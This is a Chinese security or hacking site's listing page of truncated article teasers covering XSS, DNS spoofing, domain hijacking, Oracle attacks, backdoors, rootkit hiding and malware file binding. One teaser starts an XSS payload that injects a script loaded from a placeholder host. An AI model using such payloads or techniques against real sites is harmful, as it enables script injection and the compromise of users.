网络安全 教你关于AJAX的注入(图) AJAX可以让数据在后台无声无息地进行,假如有办法让你的JS脚本与这个AJAX模块在同域内的话,那可以使用这个XSS来完成二次攻击,并且可以通过XHR对象的status属性来判断返回结果的正确与否。G... 07月21日 735 次浏览 发表评论 阅读全文
黑客狙击Oracle系统的八大常用方法 Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的,耍嘴皮子容易,兑现起来可就不那么容易了。不管什么计算机系统,人们总能够找到攻击它的方法,Oracle也不例外。本文将和大家从黑客的角... 07月21日 oracle 936 次浏览 发表评论 阅读全文
黑客域名劫持攻击的基本步骤 近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击,但攻击者所使用的技术并不是以往所使用的入侵WEB服务器,更改主页的惯用手法,攻击者使用的是一种域名... 07月21日 网络安全 1,059 次浏览 发表评论 阅读全文
教你如何在XSS中再插JS <img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';do... 07月21日 网络安全 784 次浏览 发表评论 阅读全文
DNS欺骗技术教程 定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的... 07月21日 网络安全 816 次浏览 发表评论 阅读全文
后门程序技术知识深解 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”... 07月21日 知识科普 865 次浏览 发表评论 阅读全文
用ASP脚本命令重启服务器 家知道直接使用ASP是不能够重启服务器的,这时我们需要制作一个组件来实现功能,ASP通过这个组件调用系统API,然后按照不同的重启和关机方式进行操作! 下面先说COM的制作,在VB中新建一工程,当然是... 07月21日 WEB安全 883 次浏览 发表评论 阅读全文
Rootkit隐形技术教程(图) 一、综述 本文将引领读者打造一个初级的内核级Rootkit,然后为其引入两种简单的隐形技术:进程隐形技术和文件隐形技术。同时,为了让读者获得rootkit编程的相关经验,我们顺便介绍了rootkit的... 07月21日 网络安全 726 次浏览 发表评论 阅读全文
知识科普 Unicode的消息介绍 基本知识 字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识 介绍Unicode之... 07月21日 1,042 次浏览 发表评论 阅读全文
知识科普 浅谈文件捆绑技术方式(图) 随着恶意代码的发展越来越广泛,以及其强大的破坏性和更多样的传播方式,给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意... 07月21日 1,027 次浏览 发表评论 阅读全文